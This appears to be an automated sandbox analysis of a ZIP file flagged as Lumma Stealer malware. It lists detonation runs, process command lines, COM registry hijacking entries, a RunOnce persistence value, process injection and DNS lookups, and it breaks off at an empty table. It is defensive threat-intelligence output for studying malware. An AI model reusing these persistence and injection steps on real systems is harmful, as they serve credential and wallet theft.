Analysis Overview
SHA256
ffad20c53b74e58c7f4e3ade42368adae98e71336df074b17fc31874883a6405
Threat Level: Known bad
The file #Set-Uρ__3344--P𝐚SS̤̊w0rD̼S!!#.zip was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer, LummaC
Lumma family
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Uses the VBS compiler for execution
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Event Triggered Execution: Component Object Model Hijacking
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 15:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
138s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2416 wrote to memory of 4464 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 4464 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 4464 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 4464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4464 -ip 4464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 848
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2280 wrote to memory of 2176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4804 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4804 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4804 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
137s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 392 wrote to memory of 3712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 392 wrote to memory of 3712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 392 wrote to memory of 3712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241023-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1596 wrote to memory of 2968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2300 wrote to memory of 2308 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Event Triggered Execution: Component Object Model Hijacking
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos\ = "AdjustDesktopSizePos Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ProgID\ = "DisplayServer.TVWizard.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A158544D-66FA-4F19-8806-F3CA2E2A4C52}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio\ = "SetupDigitalAudio Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv\CurVer\ = "DisplayServer.ColorSettingsAdv.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID\ = "{7945F814-7BFB-4506-A113-2BD66CDC713A}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\ = "CategoryMultiMon Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus\CurVer\ = "DisplayServer.VideoHDCPStatus.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.RotateDisplay\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CLSID\ = "{73BCA54E-6AEB-4597-8F27-E1284FF12722}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\ProgID\ = "DisplayServer.Config.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID\ = "DisplayServer.VideoHDCPStatus.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\ = "DisplayServer 1.0 Type Library" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv\CLSID\ = "{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ = "IdentifyDisp Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\ = "ScreenMove Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01367108-5EE2-4E1C-A8DE-24438065ABC9}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez.1\ = "CustomRez Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.RotateDisplay\CLSID\ = "{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\VersionIndependentProgID\ = "DisplayServer.CategoryMultiMon" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ = "VideoHDCPStatus Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID\ = "DisplayServer.ScreenTimingDVI" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\ = "CategoryAppearance Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\ = "ColorCorrection Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" | C:\Windows\system32\regsvr32.exe | N/A |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
115s
Max time network
151s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\RDJUYV.pif | N/A |
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\RDJUYV.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1852 set thread context of 4192 | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | C:\Windows\SysWOW64\more.com |
| PID 4144 set thread context of 4012 | N/A | C:\Users\Admin\AppData\Roaming\RDJUYV.pif | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\RDJUYV.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\RDJUYV.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\RDJUYV.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
